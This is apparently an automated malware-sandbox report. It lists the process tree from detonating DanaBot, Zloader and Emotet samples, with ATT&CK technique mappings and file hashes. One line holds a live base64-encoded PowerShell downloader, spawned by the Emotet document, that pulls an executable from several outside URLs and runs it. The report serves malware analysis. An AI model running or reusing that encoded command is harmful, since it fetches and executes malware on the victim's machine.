  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6636 /prefetch:1
  2⤵
  PID:2032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6788 /prefetch:1
  2⤵
  PID:900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6872 /prefetch:8
  2⤵
  PID:1740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7108 /prefetch:1
  2⤵
  PID:224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:1
  2⤵
  PID:1736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
  2⤵
  PID:3660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6152 /prefetch:8
  2⤵
  PID:400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7164 /prefetch:1
  2⤵
  PID:2876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7228 /prefetch:1
  2⤵
  PID:3948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6532 /prefetch:1
  2⤵
  PID:5420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7248 /prefetch:1
  2⤵
  PID:5728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1
  2⤵
  PID:5752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7272 /prefetch:8
  2⤵
  PID:4032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6768 /prefetch:1
  2⤵
  PID:5532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6868 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:5712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1
  2⤵
  PID:4444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1
  2⤵
  PID:5308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7712 /prefetch:1
  2⤵
  PID:3648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7628 /prefetch:1
  2⤵
  PID:5876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7488 /prefetch:1
  2⤵
  PID:2284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3740 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1836
- C:\Users\Admin\Downloads\DanaBot.exe
  "C:\Users\Admin\Downloads\DanaBot.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:464
- - C:\Windows\SysWOW64\regsvr32.exe
    C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@464
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:4112
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f0
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:5668
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 464 -s 460
    3⤵
    - Program crash
    PID:5116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7396 /prefetch:1
  2⤵
  PID:2232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6080 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7216 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
  2⤵
  PID:3676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5136 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7320 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5896
- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Downloads\Zloader (1).xlsm"
  2⤵
  - Enumerates connected drives
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious use of SetWindowsHookEx
  PID:312
- - C:\Windows\System32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\nxTgTGh\ECeMdPT\EnVYsVZ.dll,DllRegisterServer
    3⤵
    - Process spawned unexpected child process
    PID:5272
- - C:\Windows\System32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\nxTgTGh\ECeMdPT\EnVYsVZ.dll,DllRegisterServer
    3⤵
    - Process spawned unexpected child process
    PID:3076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3692 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5372
- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Downloads\Zloader.xlsm"
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:5764
- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Downloads\Zloader.xlsm"
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
  2⤵
  PID:6132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2044 /prefetch:1
  2⤵
  PID:4852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7640 /prefetch:8
  2⤵
  PID:896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,13735047159775888230,11339627551442669294,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7456 /prefetch:8
  2⤵
  PID:864

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3624

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:212

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f8 0x338
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 464 -ip 464
1⤵
PID:5600

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2216

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Temp1_Emotet (2).zip\[email protected]" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4892
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:5660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4812

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d7cb450b1315c63b1d5d89d98ba22da5

SHA1
694005cd9e1a4c54e0b83d0598a8a0c089df1556

SHA256
38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031

SHA512
df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
37f660dd4b6ddf23bc37f5c823d1c33a

SHA1
1c35538aa307a3e09d15519df6ace99674ae428b

SHA256
4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8

SHA512
807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
47KB

MD5
2bbb6e1cbade9a534747c3b0ddf11e21

SHA1
a0a1190787109ae5b6f97907584ee64183ac7dd5

SHA256
5694ef0044eb39fe4f79055ec5cab35c6a36a45b0f044d7e60f892e9e36430c9

SHA512
3cb1c25a43156199d632f87569d30a4b6db9827906a2312e07aa6f79bb8475a115481aa0ff6d8e68199d035c437163c7e876d76db8c317d8bdf07f6a770668f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
64KB

MD5
d6b36c7d4b06f140f860ddc91a4c659c

SHA1
ccf16571637b8d3e4c9423688c5bd06167bfb9e9

SHA256
34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92

SHA512
2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
67KB

MD5
69df804d05f8b29a88278b7d582dd279

SHA1
d9560905612cf656d5dd0e741172fb4cd9c60688

SHA256
b885987a52236f56ce7a5ca18b18533e64f62ab64eb14050ede93c93b5bd5608

SHA512
0ef49eeeeb463da832f7d5b11f6418baa65963de62c00e71d847183e0035be03e63c097103d30329582fe806d246e3c0e3ecab8b2498799abbb21d8b7febdc0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
19KB

MD5
2e86a72f4e82614cd4842950d2e0a716

SHA1
d7b4ee0c9af735d098bff474632fc2c0113e0b9c

SHA256
c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f

SHA512
7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
65KB

MD5
56d57bc655526551f217536f19195495

SHA1
28b430886d1220855a805d78dc5d6414aeee6995

SHA256
f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4

SHA512
7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

Filesize
26KB

MD5
8ce06435dd74849daee31c8ab278ce07

SHA1
a8e754c3a39e0f1056044cbdb743a144bdf25564

SHA256
303074dab603456b6ed26e7e6e667d52c89ab16e6db5e6a9339205ce1f6c1709

SHA512
49e99bffcdf02cfe8cef0e8ef4b121c75d365ab0bbc67c3a3af4cf199cc46e27ab2a9fdf32590697b15b0a58ee2b7a433fe962455cf91f9a404e891e73a26f59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

Filesize
40KB

MD5
3051c1e179d84292d3f84a1a0a112c80

SHA1
c11a63236373abfe574f2935a0e7024688b71ccb

SHA256
992cbdc768319cbd64c1ec740134deccbb990d29d7dccd5ecd5c49672fa98ea3

SHA512
df64e0f8c59b50bcffb523b6eab8fabf5f0c5c3d1abbfc6aa4831b4f6ce008320c66121dcedd124533867a9d5de83c424c5e9390bf0a95c8e641af6de74dabff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

Filesize
53KB

MD5
68f0a51fa86985999964ee43de12cdd5

SHA1
bbfc7666be00c560b7394fa0b82b864237a99d8c

SHA256
f230c691e1525fac0191e2f4a1db36046306eb7d19808b7bf8227b7ed75e5a0f

SHA512
3049b9bd4160bfa702f2e2b6c1714c960d2c422e3481d3b6dd7006e65aa5075eed1dc9b8a2337e0501e9a7780a38718d298b2415cf30ec9e115a9360df5fa2a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000028

Filesize
215KB

MD5
d474ec7f8d58a66420b6daa0893a4874

SHA1
4314642571493ba983748556d0e76ec6704da211

SHA256
553a19b6f44f125d9594c02231e4217e9d74d92b7065dc996d92f1e53f6bcb69

SHA512
344062d1be40db095abb7392b047b16f33ea3043158690cf66a2fa554aa2db79c4aa68de1308f1eddf6b9140b9ac5de70aad960b4e8e8b91f105213c4aace348

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000085

Filesize
102KB

MD5
510f114800418d6b7bc60eebd1631730

SHA1
acb5bc4b83a7d383c161917d2de137fd6358aabd

SHA256
f62125428644746f081ca587ffa9449513dd786d793e83003c1f9607ca741c89

SHA512
6fe51c58a110599ea5d7f92b4b17bc2746876b4b5b504e73d339776f9dfa1c9154338d6793e8bf75b18f31eb677afd3e0c1bd33e40ac58e8520acbb39245af1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000086

Filesize
93KB

MD5
b36a0543b28f4ad61d0f64b729b2511b

SHA1
bf62dc338b1dd50a3f7410371bc3f2206350ebea

SHA256
90c03a8ca35c33aad5e77488625598da6deeb08794e6efc9f1ddbe486df33e0c

SHA512
cf691e088f9852a3850ee458ef56406ead4aea539a46f8f90eb8e300bc06612a66dfa6c9dee8dcb801e7edf7fb4ed35226a5684f4164eaad073b9511189af037

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
7KB

MD5
fda3d0c9e8d02554563ab3a2f94fe486

SHA1
eb04cedcc966893d2e6d3233e8dc368db1a9f005

SHA256
6b56c2104c1e9ae1497651cb3cf55c159c81d1c1edd9e561f132f0d869102384

SHA512
50434c497a4b59351ceed027563a0649235f622e868b7fd1199c177e4f562bd759c4dcea23bb20403385f06a23366fd78e95dfcffbbdfa731ddddf8b4a617c8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
6f05503e37a11367b63e86ee00668b41

SHA1
0f4eb862f217e5c7e4c30795f65dd3084533e5f9

